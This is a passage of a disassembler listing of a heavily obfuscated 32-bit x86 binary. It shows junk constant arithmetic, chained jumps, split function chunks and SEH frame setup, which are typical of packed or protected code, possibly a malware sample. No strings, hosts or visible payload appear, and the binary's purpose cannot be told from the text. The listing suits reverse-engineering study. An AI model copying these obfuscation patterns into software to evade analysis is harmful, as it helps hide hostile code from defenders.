		push	0C9D4DF4Ah
		pop	ecx
		xor	ecx, 0B163134Dh
		and	ecx, 36009946h
		jmp	loc_43CDD6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B261

loc_44418E:				; CODE XREF: sub_45B261+17j
		jge	loc_43D677
		xchg	esi, edx
		add	edi, 1A3158C4h

loc_44419C:				; CODE XREF: sub_4498FB:loc_452C60j
		jmp	loc_43D677
; END OF FUNCTION CHUNK	FOR sub_45B261
; ---------------------------------------------------------------------------
		test	esi, ecx
		jmp	loc_447DF3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_4441A8:				; CODE XREF: sub_443375:loc_44BDB8j
					; sub_443375+DEFBj
		push	0
		push	eax
		push	8A21B2FFh
		pop	eax
		jmp	loc_448CC5
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_4441B6:				; CODE XREF: sub_45889B:loc_456C96j
		cmp	edi, 0F78E0C5Dh
		jmp	loc_4556B7
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_4441C1:				; CODE XREF: hvvrg7ie:0044DB85j
		test	esi, 88DE4DCFh
		jmp	loc_45B999
; ---------------------------------------------------------------------------

loc_4441CC:				; CODE XREF: hvvrg7ie:004431FAj
		jnz	loc_44DF18
		mov	edx, 50F9278h
		jmp	loc_44DF0D
; ---------------------------------------------------------------------------

loc_4441DC:				; CODE XREF: hvvrg7ie:00449DE5j
		xchg	edx, [esp]
		mov	ebp, esp
		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp]
		push	edx
		jmp	loc_44EA57

; =============== S U B	R O U T	I N E =======================================



sub_4441ED	proc near		; CODE XREF: hvvrg7ie:00459DA7j
					; sub_45AF0Ap

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00445919 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044812F SIZE 00000018 BYTES

		xchg	edx, [esp+0]
		pop	edx

loc_4441F1:				; CODE XREF: hvvrg7ie:loc_4463BDj
		push	large dword ptr	fs:0
		mov	large fs:0, esp
		push	dword ptr [ebp-10h]
		jmp	loc_445919
sub_4441ED	endp

; ---------------------------------------------------------------------------
		sbb	edx, ecx
		jmp	sub_44680C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_44420E:				; CODE XREF: sub_458095+Cj
		jz	loc_45B294
		jmp	loc_4461EE
; END OF FUNCTION CHUNK	FOR sub_458095

; =============== S U B	R O U T	I N E =======================================



sub_444219	proc near		; CODE XREF: hvvrg7ie:0043EA5Cj
					; hvvrg7ie:loc_443E2Fj	...

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	esi, [esp-4+arg_0]
		mov	ebp, esi
		jmp	loc_456FB8
sub_444219	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444227:				; CODE XREF: hvvrg7ie:loc_4516FEj
		add	edx, 33B5F60Eh
		mov	edx, [edx]
		push	offset sub_4452F2
		jmp	loc_452344
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_444239:				; CODE XREF: sub_45541B+3637j
		cmp	ebx, eax
		jmp	loc_44FAD3
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------

loc_444240:				; CODE XREF: hvvrg7ie:loc_445DB1j
		pop	edi
		jno	loc_4494F8
		mov	eax, [esp]
		push	edx
		call	sub_45AB9D
		mov	eax, 9DD7AB44h
		jmp	loc_4422D2
; ---------------------------------------------------------------------------

loc_44425A:				; CODE XREF: hvvrg7ie:loc_454D7Aj
					; hvvrg7ie:00454D91j
		xor	edx, 89E881DEh
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_444260:				; CODE XREF: sub_44736C:loc_443D7Dj
		add	edx, ebp
		call	sub_454D37
; END OF FUNCTION CHUNK	FOR sub_44736C
; START	OF FUNCTION CHUNK FOR sub_445FE6

loc_444267:				; CODE XREF: sub_445FE6+3j
		jmp	sub_4562B0
; END OF FUNCTION CHUNK	FOR sub_445FE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F907

loc_44426C:				; CODE XREF: sub_43F907+Aj
		jmp	loc_4465DB
; END OF FUNCTION CHUNK	FOR sub_43F907
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_444271:				; CODE XREF: sub_443BCD+EE53j
		test	ebp, edx
		jmp	loc_439E8D
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------

loc_444278:				; CODE XREF: hvvrg7ie:00452C2Cj
		cmp	ebx, eax

loc_44427A:				; CODE XREF: hvvrg7ie:loc_43D7EDj
		jmp	loc_43AF2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44427F:				; CODE XREF: sub_450434-119DDj
					; hvvrg7ie:loc_457FA3j
		cmp	ebp, esi
		jmp	loc_448A79
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_444286:				; CODE XREF: sub_454099+5C08j
		pop	edi
		rol	edi, 18h
		xor	edi, 38A855BBh
		cmp	edi, 2F25DD8Dh
		jmp	loc_4523E2
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_44429B:				; CODE XREF: hvvrg7ie:0043F9D3j
		jg	loc_45AE85
		pop	ebx
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4442A2:				; CODE XREF: sub_4465A6:loc_439EC1j
		add	ecx, 0FBCA9565h
		and	ecx, 0A3AE6349h
		jmp	loc_450B74
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_4442B3:				; CODE XREF: hvvrg7ie:00459FB2j
		jle	loc_443EDF

; =============== S U B	R O U T	I N E =======================================



sub_4442B9	proc near		; CODE XREF: sub_455087+8A1p

; FUNCTION CHUNK AT 0043B7AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F71A SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004521AD SIZE 0000000A BYTES

		xchg	esi, [esp+0]
		pop	esi
		pushf
		push	0FF5D226h
		pop	eax
		sub	eax, 2128FA39h
		jmp	loc_43F71A
sub_4442B9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448173

loc_4442CF:				; CODE XREF: sub_448173+9j
		mov	eax, [ebp-4]
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_448173
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D574

loc_4442D6:				; CODE XREF: sub_43D574+776Cj
		jmp	loc_456A24
; END OF FUNCTION CHUNK	FOR sub_43D574
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_4442DB:				; CODE XREF: sub_45541B-12288j
		jmp	loc_45750E
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4595E4

loc_4442E0:				; CODE XREF: sub_4595E4+Ej
		mov	ecx, edx
		xchg	ecx, [esp+0]
		call	sub_446D8D
		mov	eax, 0EEE68DF1h
		call	sub_44059F
		mov	ds:off_41D044, eax
		lea	eax, sub_440C05
		jmp	loc_449F1C
; END OF FUNCTION CHUNK	FOR sub_4595E4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_299. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_444306:				; CODE XREF: sub_4414F6+11910j
		jmp	loc_44113C
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_44430B:				; CODE XREF: sub_44D47A+Cj
		jmp	loc_43B810
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF3E

loc_444310:				; CODE XREF: sub_43EF3E-438j
		jmp	loc_448BDD
; END OF FUNCTION CHUNK	FOR sub_43EF3E

; =============== S U B	R O U T	I N E =======================================



sub_444315	proc near		; DATA XREF: sub_444516+4DA7o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044497F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447126 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004492D2 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044A2E4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044D2A3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004509A0 SIZE 0000001D BYTES

		push	201F1295h

loc_44431A:				; CODE XREF: sub_44646D-B79Fj
		pop	eax
		rol	eax, 0Ah
		or	eax, 0DD53458Bh
		sub	eax, 0F246280Eh
		jmp	loc_447126
sub_444315	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44432F	proc near		; DATA XREF: sub_441DAA:loc_439CF1o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439E43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004486B1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004495E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE54 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00452250 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00453B86 SIZE 0000001A BYTES

		pushf
		push	8FF01E6Ch
		pop	eax

loc_444336:				; CODE XREF: hvvrg7ie:loc_43A51Bj
		sub	eax, 6B178F50h
		or	eax, 0D40EABE6h
		jmp	loc_439E43
sub_44432F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580B4

loc_444347:				; CODE XREF: sub_4580B4+1849j
		cmp	edi, 0D0E8F452h
		jmp	loc_448D04
; END OF FUNCTION CHUNK	FOR sub_4580B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA9C

loc_444352:				; CODE XREF: sub_44CA9C:loc_45AA7Cj
		mov	edi, eax
		xchg	edi, [esp+4+var_4]
		mov	edx, eax
		call	sub_43972A

loc_44435E:				; CODE XREF: hvvrg7ie:0043CA94j
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_44CA9C

; =============== S U B	R O U T	I N E =======================================



sub_444363	proc near		; CODE XREF: hvvrg7ie:0044E829p
					; hvvrg7ie:004517D2j

; FUNCTION CHUNK AT 0044EDA2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004557EC SIZE 00000011 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	al, [ebp-9]
		shl	eax, cl
		mov	cl, [ebp-0Bh]
		xor	edx, edx
		jmp	loc_44EDA2
sub_444363	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		js	loc_455FA7
		jmp	sub_43EE1C
; ---------------------------------------------------------------------------
		mov	eax, 0CAAB96A5h
		push	edx
		push	0A7B5A7B5h
		pop	edx
		jmp	loc_450ECE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D149

loc_444392:				; CODE XREF: sub_44D149-16CBj
					; hvvrg7ie:0045615Fj
		cdq
		test	edi, 89A523E3h

loc_444399:				; CODE XREF: hvvrg7ie:loc_449D0Bj
		jmp	loc_45B4AC
; END OF FUNCTION CHUNK	FOR sub_44D149
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449387

loc_44439E:				; CODE XREF: sub_449387:loc_44009Cj
		sbb	ebp, 9AC40AADh
		jmp	loc_443745
; END OF FUNCTION CHUNK	FOR sub_449387
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4538F3

loc_4443A9:				; CODE XREF: sub_4538F3-BD6Cj
		pop	esi
; END OF FUNCTION CHUNK	FOR sub_4538F3

; =============== S U B	R O U T	I N E =======================================



sub_4443AA	proc near		; CODE XREF: sub_4538F3:loc_44A78Ej

; FUNCTION CHUNK AT 0043C157 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457042 SIZE 00000005 BYTES

		push	ebp
		push	esi
		push	edi
		push	ebx
		jmp	loc_457042
sub_4443AA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_4443B3:				; CODE XREF: sub_449425-D96Fj
		mov	esi, 8F2888CFh
		or	edi, 69EBEDE5h
		jmp	loc_4560C6
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB2D

loc_4443C3:				; CODE XREF: sub_44AB2D+10j
		mov	edx, [esp+0]
		push	edx
		mov	edx, eax
		xchg	edx, [esp+4+var_4]
		mov	eax, edx
		nop
		mov	eax, [esp+4+var_4]
		jmp	loc_448850
; END OF FUNCTION CHUNK	FOR sub_44AB2D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_4443D7:				; CODE XREF: sub_451E9F:loc_459EF4j
		or	edx, 47F1AA5Dh
		xor	edx, 4DC51BD5h
		call	sub_442DEE
; END OF FUNCTION CHUNK	FOR sub_451E9F
; START	OF FUNCTION CHUNK FOR sub_43D47E

loc_4443E8:				; CODE XREF: sub_43D47E+4714j
		jmp	nullsub_12
; END OF FUNCTION CHUNK	FOR sub_43D47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_4443ED:				; CODE XREF: sub_456F9F-F32Aj
		pop	esi
		add	esi, 0DCC121D4h
		or	esi, 0AB7A1F27h
		add	esi, ds:4000F0h
		xor	esi, 0D689FD9Bh
		jmp	loc_44277A
; END OF FUNCTION CHUNK	FOR sub_456F9F

; =============== S U B	R O U T	I N E =======================================



sub_44440B	proc near		; CODE XREF: sub_451E6D:loc_43A9F7p
					; hvvrg7ie:00447425j

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C93E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E3D9 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043FB98 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BBC6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451EE9 SIZE 0000001F BYTES

		xchg	edi, [esp-4+arg_0]
		pop	edi
		inc	ds:dword_43D6CC
		lea	eax, nullsub_15
		jmp	loc_43FB98
sub_44440B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_444420:				; CODE XREF: hvvrg7ie:0043B94Dj
		jo	loc_44097D
		not	ebx
		ror	edx, 10h
		pushf
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_44442C:				; CODE XREF: sub_43E60A:loc_43B937j
		sub	esi, 0B3E48B46h
		add	esi, 9C297D1Ah
		xchg	esi, [esp+0]
		jmp	sub_439549
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------

loc_444440:				; CODE XREF: hvvrg7ie:00447F6Ej
		test	ecx, 4D47531Bh
		jmp	loc_44353A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445DC4

loc_44444B:				; CODE XREF: sub_445DC4+6EA5j
		and	ebx, ds:4000F2h

loc_444451:				; CODE XREF: hvvrg7ie:loc_43C05Dj
		rol	ebx, 1Eh
		sub	ebx, 78DB7FF5h
		add	ebx, 4994498Bh
		jmp	loc_449C76
; END OF FUNCTION CHUNK	FOR sub_445DC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456763

loc_444465:				; CODE XREF: sub_456763:loc_459AC8j
		jnz	loc_4471BA
		jmp	loc_45522A
; END OF FUNCTION CHUNK	FOR sub_456763
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_444470:				; CODE XREF: sub_451E1C:loc_45586Bj
		jz	loc_445C0B

loc_444476:				; CODE XREF: sub_44398A+108D1j
		jmp	loc_44F7A5
; END OF FUNCTION CHUNK	FOR sub_451E1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_44447B:				; CODE XREF: sub_43E163+EF9Aj
		jmp	loc_444FFF
; END OF FUNCTION CHUNK	FOR sub_43E163
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_444480:				; CODE XREF: sub_450434-D8ACj
		jmp	loc_4521C9
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		mov	ecx, 2A5CCE48h
		jmp	loc_445C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_44448F:				; CODE XREF: sub_4500FA-F182j
		call	sub_448173

loc_444494:				; CODE XREF: sub_43EC75+156DAj
		jmp	loc_44336A
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE31

loc_444499:				; CODE XREF: sub_43FE31+Aj
		jmp	nullsub_504
; END OF FUNCTION CHUNK	FOR sub_43FE31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44449E:				; CODE XREF: sub_43D285+16j
		jmp	loc_439FA9
; ---------------------------------------------------------------------------

loc_4444A3:				; CODE XREF: sub_43D285:loc_446E33j
		push	2D74CABAh
		pop	eax
		xor	eax, 2A96950Eh
		sub	eax, 3D62C650h
		add	eax, 0F9C6D3FCh
		add	eax, ebp
		jmp	loc_447D2C
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_4444C2:				; CODE XREF: hvvrg7ie:0043EB90j
		mov	ebp, esp
		push	eax
		push	edi
		push	edx
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_4444C7:				; CODE XREF: sub_445CCD:loc_44D921j
		pop	edi
		xchg	edi, [esp+0]
		jmp	loc_456349
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_4444D0:				; CODE XREF: hvvrg7ie:loc_454CDBj
		add	edx, ebp
		add	edx, 0D20F0E7Ch
		mov	[edx], eax
		pop	edx
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4444DB:				; CODE XREF: sub_440643+1343Dj
		push	0
		push	7E7B63D1h
		pop	eax
		jmp	loc_44EC83
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4444E8:				; CODE XREF: sub_43D285+F88Ej
		ror	edx, 1Dh

loc_4444EB:				; CODE XREF: sub_43D285:loc_43A53Bj
		call	sub_444034
		lea	eax, sub_44C9B0
		push	ecx
		push	0E60FAD97h
		pop	ecx
		jmp	loc_43AA94
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
		mov	ds:dword_41D1B8, eax
		lea	eax, nullsub_539
		mov	byte ptr [eax],	0C3h
		jmp	loc_43D5D9

; =============== S U B	R O U T	I N E =======================================



sub_444516	proc near		; CODE XREF: sub_417C7B+30p
					; hvvrg7ie:004390A8j
					; DATA XREF: ...

; FUNCTION CHUNK AT 004492A6 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044EC43 SIZE 00000005 BYTES

		push	esi
		push	93DC1718h
		pop	esi
		jmp	loc_4492A6
sub_444516	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FD2B

loc_444522:				; CODE XREF: sub_43FD2B+1AA8Fj
		mov	ebp, eax
		xchg	ebp, [esp+0]
		push	0
		push	ebx
		push	0C62DB1AFh
		pop	ebx
		add	ebx, 1B1B0936h
		jmp	loc_447C28
; END OF FUNCTION CHUNK	FOR sub_43FD2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_44453B:				; CODE XREF: sub_450246:loc_44232Fj
		mov	eax, ecx
		xchg	eax, [esp+0]

loc_444540:				; CODE XREF: hvvrg7ie:loc_4469D9j
		push	59F7EA44h
		pop	ecx
		jmp	loc_456107
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------

loc_44454B:				; CODE XREF: hvvrg7ie:0043D0DEj
		jp	loc_456525
		jnb	loc_455E4A
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_444557:				; CODE XREF: sub_44BCAE:loc_43D0CBj
					; hvvrg7ie:loc_446DE3j
		add	ecx, 0BA514987h
		call	sub_455E0D

loc_444562:				; CODE XREF: sub_446D8D+DB7Fj
		jmp	loc_44BBB6
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C421

loc_444567:				; CODE XREF: sub_43C421+148E4j
		push	offset loc_43F2FD
		jmp	nullsub_132
; END OF FUNCTION CHUNK	FOR sub_43C421
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_523. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_444572:				; CODE XREF: sub_446D8D+79C3j
		jmp	nullsub_134
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------

loc_444577:				; CODE XREF: hvvrg7ie:00452974j
		jnz	loc_455066

; =============== S U B	R O U T	I N E =======================================



sub_44457D	proc near		; CODE XREF: sub_45ACF1-D9AFp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043EB86 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004483F3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004555F6 SIZE 00000018 BYTES

		xchg	edx, [esp+0]
		pop	edx
		sbb	ebx, eax
		jmp	loc_4555F6
sub_44457D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE41

loc_444588:				; CODE XREF: sub_43AE41+Dj
		jnz	loc_4483B9
		jmp	loc_449E37
; END OF FUNCTION CHUNK	FOR sub_43AE41

; =============== S U B	R O U T	I N E =======================================



sub_444593	proc near		; CODE XREF: sub_446FC5:loc_43C9E9p
					; hvvrg7ie:0044407Dj ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439F46 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044525A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00459EC4 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	edx

loc_444598:				; CODE XREF: hvvrg7ie:00458127j
		push	ebx
		push	8F20812h
		pop	ebx
		jmp	loc_439F46
sub_444593	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_4445A4:				; CODE XREF: sub_4500FA-CD8Aj
		cmp	eax, 8F94021Eh
		jmp	loc_45528C
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
		jno	loc_45B435
		jmp	sub_43D0B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456E27

loc_4445BA:				; CODE XREF: sub_456E27:loc_43FA5Ej
		adc	eax, esi
		shl	edx, 11h
		mov	ebp, 0F28A5A6Dh
		jmp	loc_45B0B0
; END OF FUNCTION CHUNK	FOR sub_456E27
; ---------------------------------------------------------------------------

loc_4445C9:				; DATA XREF: sub_439B44+13CC8o
		jnz	loc_439B50
		mov	eax, [esp]
		push	edx
		push	ecx
		push	349753B9h
		jmp	loc_442EB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4445DE:				; CODE XREF: sub_43D285+15D76j
		jp	loc_45AE39
		rol	edx, 1Dh

loc_4445E7:				; CODE XREF: sub_43D285:loc_446D6Aj
		push	eax
		push	0D29CDBEh
		pop	eax
		and	eax, 0C66E5A5h
		jmp	loc_458515
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_4445F9:				; CODE XREF: sub_451E6D:loc_43D649j
					; sub_451E6D-101A2j ...
		push	0E674109Ch
		pop	eax
		or	eax, 289DD81Ah
		rol	eax, 1
		jmp	loc_439F41
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D910

loc_44460C:				; CODE XREF: sub_43D910:loc_458256j
		mov	ebx, edx
		xchg	ebx, [esp+0]
		push	offset sub_441DDD
		jmp	sub_446910
; END OF FUNCTION CHUNK	FOR sub_43D910
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_44461B:				; CODE XREF: sub_45541B-142C8j
					; sub_45541B:loc_441280j
		lea	eax, [ebp+var_24]
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		push	4
		lea	eax, [ebp+var_1C8]
		push	eax
		jmp	loc_44305B
; END OF FUNCTION CHUNK	FOR sub_45541B

; =============== S U B	R O U T	I N E =======================================



sub_444632	proc near		; CODE XREF: hvvrg7ie:00443334j
					; DATA XREF: hvvrg7ie:00440F82o

var_4		= dword	ptr -4

		call	sub_446A16
		push	esi
		mov	esi, eax
		xchg	esi, [esp+4+var_4]
		ror	eax, 6
		mov	ds:dword_43CD84, eax
		jmp	nullsub_532
sub_444632	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E9D6

loc_44464B:				; CODE XREF: sub_43E9D6:loc_446266j
		xchg	edx, [esp+4+var_4]
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		push	offset loc_43AD9B
		jmp	sub_451D01
; END OF FUNCTION CHUNK	FOR sub_43E9D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_44465E:				; CODE XREF: sub_444B29:loc_440F17j
		jnz	loc_43E365
		jmp	loc_44EA04
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------

loc_444669:				; CODE XREF: hvvrg7ie:loc_44FE41j
		jnz	loc_450DAF
; START	OF FUNCTION CHUNK FOR sub_4556E8

loc_44466F:				; CODE XREF: sub_4556E8+3j
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_4556E8
; ---------------------------------------------------------------------------
		xor	edx, ecx
		mov	ebp, 0B3D9B77Fh
		jmp	loc_450DAD
; ---------------------------------------------------------------------------

loc_444680:				; CODE XREF: hvvrg7ie:loc_45A818j
		jnz	loc_44515C
		jmp	loc_450909
; ---------------------------------------------------------------------------

loc_44468B:				; CODE XREF: hvvrg7ie:0043F058j
		jnz	loc_4558F1
		jmp	loc_44A1EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A7A

loc_444696:				; CODE XREF: sub_450A7A:loc_454C5Ej
		and	ebx, 34C1FC97h
		xor	ebx, 0E3A0D6AEh
		sub	ebx, 667028B1h
		test	ebx, 4000h
		jmp	loc_43E6D6
; END OF FUNCTION CHUNK	FOR sub_450A7A
; ---------------------------------------------------------------------------

loc_4446B3:				; CODE XREF: hvvrg7ie:loc_457CF5j
					; hvvrg7ie:00457D07j
		sub	ecx, 7E50A2D3h
		add	ecx, 0FA15EAF0h
		push	offset sub_445A0B
		jmp	loc_453886
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_4446C9:				; CODE XREF: sub_43C811:loc_44B8C4j
		jz	loc_4597AA
; END OF FUNCTION CHUNK	FOR sub_43C811
; START	OF FUNCTION CHUNK FOR sub_4504E0

loc_4446CF:				; CODE XREF: sub_4504E0-E514j
		jmp	nullsub_222
; END OF FUNCTION CHUNK	FOR sub_4504E0
; ---------------------------------------------------------------------------
		jl	loc_457E5B
		mov	[edx], edi
		js	loc_456165
		test	ebp, edi
		jmp	loc_4597A4

; =============== S U B	R O U T	I N E =======================================



sub_4446E9	proc near		; CODE XREF: hvvrg7ie:00454821j
					; sub_45B07D+13p

; FUNCTION CHUNK AT 0043F4A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443730 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A262 SIZE 00000008 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [ebp-4]
		movzx	eax, byte ptr [eax]
		cmp	ds:dword_44EE40[eax*4],	0
		jz	loc_45A262
		push	offset sub_45560E
		jmp	loc_443730
sub_4446E9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458706

loc_44470B:				; CODE XREF: sub_458706:loc_445ED1j
		pop	eax
		add	eax, 71ED023Eh
		or	eax, ds:4000F3h
		sub	eax, 98135366h
		jmp	loc_43E7B4
; END OF FUNCTION CHUNK	FOR sub_458706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443B00

loc_444723:				; CODE XREF: sub_443B00:loc_44EE35j
		add	eax, 9D992D5Eh
		mov	eax, [eax]

loc_44472B:				; CODE XREF: sub_4415C4+3784j
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+0]
		push	eax
		jmp	loc_443900
; END OF FUNCTION CHUNK	FOR sub_443B00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405AA

loc_444737:				; CODE XREF: sub_4405AA+Bj
		mov	eax, [esp-4+arg_0]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+0]
		call	sub_4562DC
		push	6AB07FEEh
		jmp	loc_44E2F6
; END OF FUNCTION CHUNK	FOR sub_4405AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_240. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
